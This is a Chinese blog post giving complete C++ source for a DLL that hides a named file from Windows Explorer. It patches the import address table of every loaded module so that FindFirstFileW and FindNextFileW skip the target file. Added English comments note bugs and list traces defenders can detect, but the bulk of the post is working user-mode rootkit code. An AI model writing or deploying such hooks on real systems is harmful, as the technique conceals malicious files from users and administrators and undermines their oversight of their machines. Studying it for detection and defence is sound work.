用户态下HOOK API隐藏文件
文章转自王牌软件
突然想写个RING3下隐藏文件的程序,于是花了一天的时间,把我以前写的一个HOOK send的程序改了。
要实现Ring3下隐藏文件,最简单的方法就是HOOK掉Explorer进程里的FindFirstFile和FindNextFile函数。考虑到A和W两个版本,我们本应HOOK四个函数,但事实上只要HOOK掉W版本的两个函数就可以了,因为用Dependency看一下就能发现Explorer.exe并没有使用FindFirstFileA和FindNextFileA。HOOK API的方法有很多种,我这里用的是HOOK IAT法,也就是遍历Explorer进程中的所有模块,凡是模块的导入表中用到FindFirstFileW和FindNextFileW的,就把FirstThunk数组中对应项的Function地址改为MyFindFirstFileW和MyFindNextFileW的地址,再在MyFindFirstFileW函数中调用真实的FindFirstFileW地址,MyFindNextFileW函数类似。以下直接给出源程序;程序中为了保险也可以HOOK掉A版本的函数,只要把//#define HookProA这一行的注释符号去掉就行。
[cce_cpp]
// Hook FindFile.cpp : defines the entry point for the DLL application.
//
// What this listing does, as visible in the code below: once the DLL is loaded
// into a process, DllMain starts a thread (APIHook) that resolves the real
// FindFirstFileW/FindNextFileW exports from kernel32, then walks every module
// in the process (DLLFind) and overwrites the kernel32 IAT slots holding those
// two addresses with the addresses of MyFindFirstFileW/MyFindNextFileW
// (IATFind). The replacement functions forward to the originals and skip the
// directory entry whose name matches the file named by HIDEFILE.
//
// Detection notes for defenders, all derived from this file: after patching,
// an IAT slot for FindFirstFileW/FindNextFileW points into this DLL's image
// instead of kernel32; the patch is applied with VirtualProtect(PAGE_READWRITE)
// followed by WriteProcessMemory on the current process; a worker thread is
// created directly from DllMain; only import descriptors named "kernel32.dll"
// are touched; and the hooks are never removed.
//
#include "stdafx.h"
#include "stdlib.h"
#include<windows.h>
#include <Dbghelp.h>   // ImageDirectoryEntryToData (used by IATFind)
#include <tlhelp32.h>  // CreateToolhelp32Snapshot / Module32First / Module32Next
#include "mydebug.h"   // presumably declares the file_str/file_str2/file_num trace helpers referenced only in commented-out lines — confirm
#pragma comment(lib, "imagehlp.lib")

// Full path of the file to hide. Must not end in '\': the code below splits it
// at the last backslash into a directory part and a file-name part.
#define HIDEFILE "E:\\abc\\abc.txt"
// When defined, the A (ANSI) variants are hooked as well.
//#define HookProA

// Signatures of FindFirstFile/FindNextFile used to call the saved original
// addresses. LPCTSTR/LPWIN32_FIND_DATA follow the project's TCHAR setting; the
// W wrappers cast lpFileName to WCHAR* explicitly, which suggests the listing
// was built without UNICODE — confirm against the project settings.
typedef HANDLE (WINAPI *PFNFindFirstFile)(LPCTSTR lpFileName, LPWIN32_FIND_DATA lpFindFileData );
typedef BOOL (WINAPI *PFNFindNextFile)(HANDLE hFindFile,LPWIN32_FIND_DATA lpFindFileData );

// (replacement, original) address pairs. Filled in by APIHook; used by DLLFind
// as the (ToAddr, FromAddr) arguments of IATFind.
DWORD *MyFindFirstFileWAddr,*FindFirstFileWAddr;
DWORD *MyFindNextFileWAddr,*FindNextFileWAddr;
#ifdef HookProA
DWORD *MyFindFirstFileAAddr,*FindFirstFileAAddr;
DWORD *MyFindNextFileAAddr,*FindNextFileAAddr;
#endif
// Set by MyFindFirstFile*, read by MyFindNextFile*: whether the most recent
// search path lies in the directory of HIDEFILE. Process-wide and
// unsynchronized, so enumerations running concurrently on different threads
// share (and can overwrite) it.
bool bPathMatch=false;

// Replacement for FindFirstFileW. Forwards to the original, then records in
// bPathMatch whether lpFileName starts with the directory part of HIDEFILE.
// The first entry returned by the original is passed through unfiltered; only
// MyFindNextFileW drops entries.
//
// @param lpFileName      search path supplied by the caller (treated as WCHAR*)
// @param lpFindFileData  receives the first entry exactly as the original fills it
// @return the HANDLE returned by the original FindFirstFileW
HANDLE WINAPI MyFindFirstFileW(LPCTSTR lpFileName, LPWIN32_FIND_DATA lpFindFileData )
{
    HANDLE hFind;
    // Directory part of HIDEFILE as a wide string; computed on the first call
    // and kept for the lifetime of the process.
    static WCHAR HidePath[MAX_PATH+1]={0};
    int i;
    /*
    file_str("---------------------------------------","F:\\temp2.txt");
    i=WideCharToMultiByte(CP_ACP,0,(WCHAR *)lpFileName,wcslen((WCHAR *)lpFileName),path,MAX_PATH,0,0);
    path[i]='\0';
    file_str(path,"F:\\temp2.txt");
    */
    if(wcslen(HidePath)==0)
    {
        // Convert HIDEFILE (ANSI) to wide; i is the number of WCHARs written
        // (0 if the conversion fails). The input length excludes the NUL, so
        // termination comes from the truncation below.
        i=MultiByteToWideChar(CP_ACP,0,HIDEFILE,strlen(HIDEFILE),HidePath,MAX_PATH);
        // Cut at the last backslash, leaving only the directory part.
        while(HidePath[i]!='\\' && i>0) i--;
        HidePath[i]='\0';
        //file_str2(HidePath,"F:\\temp1.txt");
    }
    // Call the real FindFirstFileW first; its result is returned unchanged.
    hFind=((PFNFindFirstFile)FindFirstFileWAddr)(lpFileName,lpFindFileData);
    // Case-insensitive *prefix* compare over wcslen(HidePath) characters: any
    // search path that merely begins with the directory string also matches,
    // and an empty HidePath (length 0) matches every path.
    if(wcsnicmp((WCHAR *)lpFileName,HidePath,wcslen(HidePath))==0)
    {
        bPathMatch=true;
        //file_str("path matched","F:\\temp1.txt");
    }
    else
    {
        bPathMatch=false;
        //file_str("path not matched","F:\\temp1.txt");
    }
    /*
    i=WideCharToMultiByte(CP_ACP,0,(WCHAR *)lpFindFileData->cFileName,wcslen((WCHAR *)lpFindFileData->cFileName),path,MAX_PATH,0,0);
    path[i]='\0';
    file_str(path,"F:\\temp2.txt");
    */
    return hFind;
}

// Replacement for FindNextFileW. Forwards to the original; when bPathMatch was
// set by MyFindFirstFileW, keeps calling the original until the returned
// cFileName no longer starts with the file-name part of HIDEFILE, so that
// entry is never handed to the caller.
//
// @param hFindFile       search handle from FindFirstFileW
// @param lpFindFileData  receives the next entry that survived the filter
// @return the last BOOL returned by the original; FALSE (end of enumeration or
//         error) ends the skip loop and is passed through
BOOL WINAPI MyFindNextFileW(HANDLE hFindFile,LPWIN32_FIND_DATA lpFindFileData)
{
    BOOL bReturn;
    // File-name part of HIDEFILE as a wide string; computed on the first call.
    static WCHAR HideName[MAX_PATH+1]={0};
    int i,j;
    bReturn=((PFNFindNextFile)FindNextFileWAddr)(hFindFile,lpFindFileData);
    if(bPathMatch)
    {
        if(wcslen(HideName)==0)
        {
            i=MultiByteToWideChar(CP_ACP,0,HIDEFILE,strlen(HIDEFILE),HideName,MAX_PATH);  // i = WCHARs written
            HideName[i]='\0';                       // terminate, then scan back to the last backslash
            while(HideName[i]!='\\' && i>0) i--;
            i++;                                    // first character after the backslash
            j=0;
            // Shift the file-name tail down to the start of the buffer in place.
            while(HideName[i]!='\0' && i<MAX_PATH)
            {
                HideName[j]=HideName[i];
                i++;j++;
            }
            HideName[j]='\0';
            //file_str2(HideName,"F:\\temp1.txt");
        }
        // Prefix compare again (wcslen(HideName) characters): names that merely
        // begin with the hidden file's name (constructed example: "abc.txt.bak")
        // are skipped as well.
        while(wcsnicmp((WCHAR *)lpFindFileData->cFileName,HideName,wcslen(HideName))==0)
        {
            bReturn=((PFNFindNextFile)FindNextFileWAddr)(hFindFile,lpFindFileData);
            //file_str("needs hiding","F:\\temp1.txt");
            // Stop on FALSE so the end-of-enumeration result reaches the caller.
            if(bReturn==false) break;
        }
    }
    //i=WideCharToMultiByte(CP_ACP,0,(WCHAR *)lpFindFileData->cFileName,wcslen((WCHAR *)lpFindFileData->cFileName),name,MAX_PATH,0,0);
    //name[i]='\0';
    //file_str(name,"F:\\temp2.txt");
    return bReturn;
}
//----------------------------------------------------
#ifdef HookProA
// ANSI counterpart of MyFindFirstFileW. Differs from the W version in two
// visible ways: the hide path is copied with strcpy instead of converted, and
// the comparison is a full stricmp, so only a search path equal to the
// directory string (not one merely starting with it) sets bPathMatch.
//
// @return the HANDLE returned by the original FindFirstFileA
HANDLE WINAPI MyFindFirstFileA(LPCTSTR lpFileName, LPWIN32_FIND_DATA lpFindFileData )
{
    HANDLE hFind;
    // Directory part of HIDEFILE; computed on the first call.
    static char HidePath[MAX_PATH+1]={0};
    int i;
    /*
    file_str("---------------------------------------","F:\\temp2.txt");
    i=WideCharToMultiByte(CP_ACP,0,(WCHAR *)lpFileName,wcslen((WCHAR *)lpFileName),path,MAX_PATH,0,0);
    path[i]='\0';
    file_str(path,"F:\\temp2.txt");
    */
    if(strlen(HidePath)==0)
    {
        strcpy(HidePath,HIDEFILE);
        i=strlen(HidePath);
        // Cut at the last backslash, leaving only the directory part.
        while(HidePath[i]!='\\' && i>0) i--;
        HidePath[i]='\0';
        //file_str2(HidePath,"F:\\temp1.txt");
    }
    hFind=((PFNFindFirstFile)FindFirstFileAAddr)(lpFileName,lpFindFileData);
    // Exact (case-insensitive) compare, unlike the prefix compare in the W version.
    if(stricmp(lpFileName,HidePath)==0)
    {
        bPathMatch=true;
        //file_str("path matched","F:\\temp1.txt");
    }
    else
    {
        bPathMatch=false;
        //file_str("path not matched","F:\\temp1.txt");
    }
    /*
    i=WideCharToMultiByte(CP_ACP,0,(WCHAR *)lpFindFileData->cFileName,wcslen((WCHAR *)lpFindFileData->cFileName),path,MAX_PATH,0,0);
    path[i]='\0';
    file_str(path,"F:\\temp2.txt");
    */
    return hFind;
}

// ANSI counterpart of MyFindNextFileW. As written, the first forward call goes
// through FindNextFileWAddr while the skip loop calls FindNextFileAAddr; the two
// addresses differ. The name check is an exact stricmp, not a prefix compare.
//
// @return the last BOOL returned by the forwarded call; FALSE ends the skip loop
BOOL WINAPI MyFindNextFileA(HANDLE hFindFile,LPWIN32_FIND_DATA lpFindFileData)
{
    BOOL bReturn;
    // File-name part of HIDEFILE; computed on the first call.
    static char HideName[MAX_PATH+1]={0};
    int i,j;
    bReturn=((PFNFindNextFile)FindNextFileWAddr)(hFindFile,lpFindFileData);
    if(bPathMatch)
    {
        if(strlen(HideName)==0)
        {
            strcpy(HideName,HIDEFILE);
            i=strlen(HideName);
            while(HideName[i]!='\\' && i>0) i--;
            i++;                                    // first character after the backslash
            j=0;
            // Shift the file-name tail down to the start of the buffer in place.
            while(HideName[i]!='\0' && i<MAX_PATH)
            {
                HideName[j]=HideName[i];
                i++;j++;
            }
            HideName[j]='\0';
            //file_str2(HideName,"F:\\temp1.txt");
        }
        while(stricmp(lpFindFileData->cFileName,HideName)==0)
        {
            bReturn=((PFNFindNextFile)FindNextFileAAddr)(hFindFile,lpFindFileData);
            //file_str("needs hiding","F:\\temp1.txt");
            if(bReturn==false) break;
        }
    }
    //i=WideCharToMultiByte(CP_ACP,0,(WCHAR *)lpFindFileData->cFileName,wcslen((WCHAR *)lpFindFileData->cFileName),name,MAX_PATH,0,0);
    //name[i]='\0';
    //file_str(name,"F:\\temp2.txt");
    return bReturn;
}
#endif
//////----------------------------------------------------------
// Redirects one IAT slot in the module named `module`: locates the import
// descriptor named "kernel32.dll", walks its FirstThunk (bound-address) array,
// and when a slot holds FromAddr overwrites it with ToAddr. Called by DLLFind
// once per loaded module for each (original, replacement) pair.
//
// @param FromAddr  address currently expected in the slot (the real kernel32 export)
// @param ToAddr    address written into the slot (the replacement function)
// @param module    module name as reported by the toolhelp snapshot
//
// Observations from the code: only descriptors whose name is exactly
// "kernel32.dll" are considered (an import resolved through a differently
// named DLL would not be found); the first matching slot per descriptor is
// patched and the thunk loop left with `break`; the VirtualQuery result mbi
// is never read; the return values of VirtualProtect and WriteProcessMemory
// are not checked; the PIMAGE_THUNK_DATA32 cast and the sizeof(DWORD) write
// tie this to a 32-bit IAT.
void IATFind(DWORD *FromAddr,DWORD *ToAddr,const char *module)
{
    PIMAGE_IMPORT_DESCRIPTOR pImportDescriptor;
    PIMAGE_THUNK_DATA pThunkData;
    ULONG uSize ;
    DWORD *Addr2;
    DWORD dwOLD;
    MEMORY_BASIC_INFORMATION mbi;
    HMODULE hMod=GetModuleHandle(module);
    // true: hMod is a mapped image in memory, not a file on disk.
    pImportDescriptor=(PIMAGE_IMPORT_DESCRIPTOR)ImageDirectoryEntryToData(hMod,true,IMAGE_DIRECTORY_ENTRY_IMPORT,&uSize);
    if(!pImportDescriptor) return;
    while(pImportDescriptor->Name)
    {
        char *szModName = (char *)((PBYTE)hMod+pImportDescriptor->Name) ;
        if(stricmp(szModName,"kernel32.dll")==0)
        {
            //file_str("found kernel32.dll","F:\\temp.txt");
            pThunkData = (PIMAGE_THUNK_DATA32)((PBYTE)hMod+pImportDescriptor->FirstThunk) ;
            while(pThunkData->u1.Function)
            {
                //file_str("pThunkData loop","F:\\temp.txt");
                Addr2 = (DWORD *)pThunkData->u1.Function ;
                //file_num((DWORD)Addr2,"F:\\temp.txt");
                if((DWORD)Addr2==(DWORD)FromAddr)
                {
                    //file_str("found import","F:\\temp.txt");
                    VirtualQuery(&(pThunkData->u1.Function),&mbi,sizeof(mbi));
                    // Make the slot writable, overwrite it with ToAddr (the
                    // value of the pointer, hence &ToAddr), then restore the
                    // previous protection.
                    VirtualProtect(&(pThunkData->u1.Function),sizeof(DWORD),PAGE_READWRITE,&dwOLD);
                    WriteProcessMemory(GetCurrentProcess(),&(pThunkData->u1.Function),&ToAddr, sizeof(DWORD), NULL);
                    VirtualProtect(&(pThunkData->u1.Function),sizeof(DWORD),dwOLD,0);
                    break ;
                }
                pThunkData++ ;
            }
        }
        pImportDescriptor++ ;
    }
}
//---------------------------------------------
// Enumerates every module loaded in the current process and calls IATFind on
// each for the W pair (and the A pair when HookProA is defined). Neither
// hSnapshot (INVALID_HANDLE_VALUE on failure) nor the Module32First result is
// checked, so on failure the do/while runs once on indeterminate data.
void DLLFind()
{
    HANDLE hSnapshot= NULL;
    MODULEENTRY32 moudle;
    hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,GetCurrentProcessId());
    moudle.dwSize = sizeof(MODULEENTRY32);
    Module32First(hSnapshot,&moudle);
    do
    {
        //file_str(moudle.szModule,"F:\\temp.txt");
        IATFind(FindFirstFileWAddr,MyFindFirstFileWAddr,moudle.szModule);
        IATFind(FindNextFileWAddr,MyFindNextFileWAddr,moudle.szModule);
#ifdef HookProA
        IATFind(FindFirstFileAAddr,MyFindFirstFileAAddr,moudle.szModule);
        IATFind(FindNextFileAAddr,MyFindNextFileAAddr,moudle.szModule);
#endif
    } while(Module32Next(hSnapshot,&moudle) );
    CloseHandle(hSnapshot);
}

// Thread routine started from DllMain. Resolves the real export addresses from
// kernel32 into the global pointer pairs, then loops forever re-running DLLFind
// every 100000 ms (100 s) so modules loaded after the first pass get patched
// too. Re-running on an already patched module is a no-op, because its slot no
// longer equals FromAddr. The loop never exits, so `return 0` is unreachable.
// CloseHandle(h) is applied to an HMODULE from GetModuleHandle, which is not a
// kernel object handle.
//
// @param lpParameter  unused
DWORD WINAPI APIHook(LPVOID lpParameter)
{
    HMODULE h;
    h=GetModuleHandle("kernel32.dll");
    MyFindFirstFileWAddr=(DWORD *)MyFindFirstFileW;
    FindFirstFileWAddr=(DWORD *)GetProcAddress(h,"FindFirstFileW");
    MyFindNextFileWAddr=(DWORD *)MyFindNextFileW;
    FindNextFileWAddr=(DWORD *)GetProcAddress(h,"FindNextFileW");
#ifdef HookProA
    MyFindFirstFileAAddr=(DWORD *)MyFindFirstFileA;
    FindFirstFileAAddr=(DWORD *)GetProcAddress(h,"FindFirstFileA");
    MyFindNextFileAAddr=(DWORD *)MyFindNextFileA;
    FindNextFileAAddr=(DWORD *)GetProcAddress(h,"FindNextFileA");
#endif
    CloseHandle(h);
    while(1)
    {
        DLLFind();
        Sleep(100000);
    }
    return 0;
}

// DLL entry point. On DLL_PROCESS_ATTACH starts the hooking thread; the thread
// handle is discarded. There is no DLL_PROCESS_DETACH handling and no unhook
// anywhere in this file, so once the DLL is unloaded the patched IAT slots keep
// pointing at its former image.
BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    if(ul_reason_for_call==DLL_PROCESS_ATTACH)
        CreateThread(0,0,APIHook,0,0,0);
    return TRUE;
}
[/cce_cpp] |
本文出自 学习日记,转载时请注明出处及相应链接。
本文永久链接: https://www.softwareace.cn/?p=305